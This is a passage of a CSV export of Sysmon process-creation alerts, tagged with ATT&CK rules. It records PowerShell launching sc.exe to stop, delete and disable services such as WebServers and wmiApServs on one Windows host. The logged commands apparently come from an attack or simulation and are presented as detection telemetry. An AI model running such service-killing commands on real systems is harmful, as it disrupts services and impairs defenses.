Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:59.002",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:51:30.990 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001069682b00} +ProcessId: 6556 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.996476800Z"",""eventRecordID"":""3240"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.990\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001069682b00}\r\nProcessId: 6556\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.990"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-001069682b00}"",""processId"":""6556"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.969",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.919 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001072662b00} +ProcessId: 3460 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete 
WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.930569200Z"",""eventRecordID"":""3238"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.919\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001072662b00}\r\nProcessId: 3460\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.919"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-001072662b00}"",""processId"":""3460"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.966",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.875 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001094652b00} +ProcessId: 6716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.884597000Z"",""eventRecordID"":""3237"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.875\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001094652b00}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:30.875"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-001094652b00}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.833",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.764 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001011632b00} +ProcessId: 6332 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.773042700Z"",""eventRecordID"":""3234"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.764\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001011632b00}\r\nProcessId: 6332\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.764"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-001011632b00}"",""processId"":""6332"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.726",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.331 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-00104c5f2b00} +ProcessId: 6488 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.334596500Z"",""eventRecordID"":""3231"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.331\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-00104c5f2b00}\r\nProcessId: 6488\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.331"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-00104c5f2b00}"",""processId"":""6488"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.689",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.272 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-00105c5d2b00} +ProcessId: 7428 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config wmiApServs Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config wmiApServs Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.290750400Z"",""eventRecordID"":""3230"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.272\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-00105c5d2b00}\r\nProcessId: 7428\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config wmiApServs Start= 
Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.272"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-00105c5d2b00}"",""processId"":""7428"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config wmiApServs Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
